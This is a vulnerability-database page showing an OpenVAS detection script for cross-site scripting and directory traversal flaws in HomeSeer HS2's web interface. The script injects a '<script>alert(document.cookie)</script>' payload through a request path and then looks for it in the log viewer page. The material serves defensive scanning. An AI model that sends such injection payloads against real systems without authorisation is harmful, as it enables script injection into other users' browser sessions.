Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2011 SecPodOPENVAS:902648
HistoryDec 20, 2011 - 12:00 a.m.

HomeSeer HS2 Web Interface Multiple Vulnerabilities

2011-12-2000:00:00
Copyright (C) 2011 SecPod
plugins.openvas.org
8

EPSS

0.004

Percentile

74.2%

JSON

This host is running HomeSeer HS2 and is prone to multiple
vulnerabilities.

###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_homeseer_hs2_web_interface_mult_vuln.nasl 7015 2017-08-28 11:51:24Z teissa $
#
# HomeSeer HS2 Web Interface Multiple Vulnerabilities
#
# Authors:
# Rachana Shetty <[email protected]>
#
# Copyright:
# Copyright (c) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation will allow attacker to execute arbitrary
HTML and script code in a user's browser session in the context of a vulnerable
site and gain sensitive information via directory traversal attacks.

Impact Level: Application";

tag_affected = "HomeSeer HS2 version 2.5.0.20";

tag_insight = "The flaws are due to improper validation of user-supplied input
passed via the URL, which allows attacker to conduct stored and reflective
xss by sending a crafted request with JavaScript to web interface and
causing the JavaScript to be stored in the log viewer page.";

tag_solution = "No solution or patch was made available for at least one year
since disclosure of this vulnerability. Likely none will be provided anymore.
General solution options are to upgrade to a newer release, disable respective
features, remove the product or replace the product by another one.";

tag_summary = "This host is running HomeSeer HS2 and is prone to multiple
vulnerabilities.";

if(description)
{
  script_id(902648);
  script_version("$Revision: 7015 $");
  script_cve_id("CVE-2011-4835", "CVE-2011-4836", "CVE-2011-4837");
  script_bugtraq_id(50978);
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $");
  script_tag(name:"creation_date", value:"2011-12-20 15:01:39 +0530 (Tue, 20 Dec 2011)");
  script_name("HomeSeer HS2 Web Interface Multiple Vulnerabilities");
  script_xref(name : "URL" , value : "http://secunia.com/advisories/47191/");
  script_xref(name : "URL" , value : "http://www.kb.cert.org/vuls/id/796883");
  script_xref(name : "URL" , value : "http://xforce.iss.net/xforce/xfdb/71713");

  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2011 SecPod");
  script_family("Web application abuses");
  script_dependencies("gb_get_http_banner.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("HomeSeer/banner");
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  script_tag(name:"solution_type", value:"WillNotFix");
  exit(0);
}

##
## The script code starts here
##

include("http_func.inc");
include("http_keepalive.inc");

## Get HTTP Port
port = get_http_port(default:80);
if(!port){
  exit(0);
}

## Check port status
if(!get_port_state(port)){
  exit(0);
}

## Get the banner
banner = get_http_banner(port: port);

## Confirm the application before trying exploit
if("Server: HomeSeer" >!< banner) {
  exit(0);
}

## Construct the attack request
sndReq = http_get(item:string("/stat<script>alert(document.cookie)" +
                     "</script>"), port:port);
rcvRes = http_send_recv(port:port, data:sndReq);

## Confirm the exploit
if(http_vuln_check(port:port, url:"/elog", pattern:"<script>alert\(" +
                                "document.cookie\)</script>", check_header:TRUE))
{
  security_message(port);
  exit(0);
}

Related

openvas 1
exploitdb 2
cvelist 3
nvd 3
prion 3
cve 3
openvas
openvas
HomeSeer HS2 Web Interface <= 2.5.0.20 Multiple XSS Vulnerabilities - Active Check
2011-12-20 00:00:00
exploitdb
exploitdb
HomeSeer HS2 and HomeSeer PRO - Multiple Vulnerabilities
2012-03-07 00:00:00
HomeSeer HS2 2.5.0.20 - Web Interface Log Viewer Page URI Cross-Site Scripting
2011-12-08 00:00:00
cvelist
cvelist
CVE-2011-4837
2011-12-15 02:00:00
CVE-2011-4836
2011-12-15 02:00:00
CVE-2011-4835
2011-12-15 02:00:00
nvd
nvd
CVE-2011-4837
2011-12-15 03:57:35
CVE-2011-4836
2011-12-15 03:57:35
CVE-2011-4835
2011-12-15 03:57:35
prion
prion
Cross site scripting
2011-12-15 03:57:00
Cross site request forgery (csrf)
2011-12-15 03:57:00
Directory traversal
2011-12-15 03:57:00
cve
cve
CVE-2011-4837
2011-12-15 03:57:35
CVE-2011-4836
2011-12-15 03:57:35
CVE-2011-4835
2011-12-15 03:57:35

EPSS

0.004

Percentile

74.2%

JSON
Related for OPENVAS:902648
openvas1exploitdb2cvelist3nvd3prion3cve3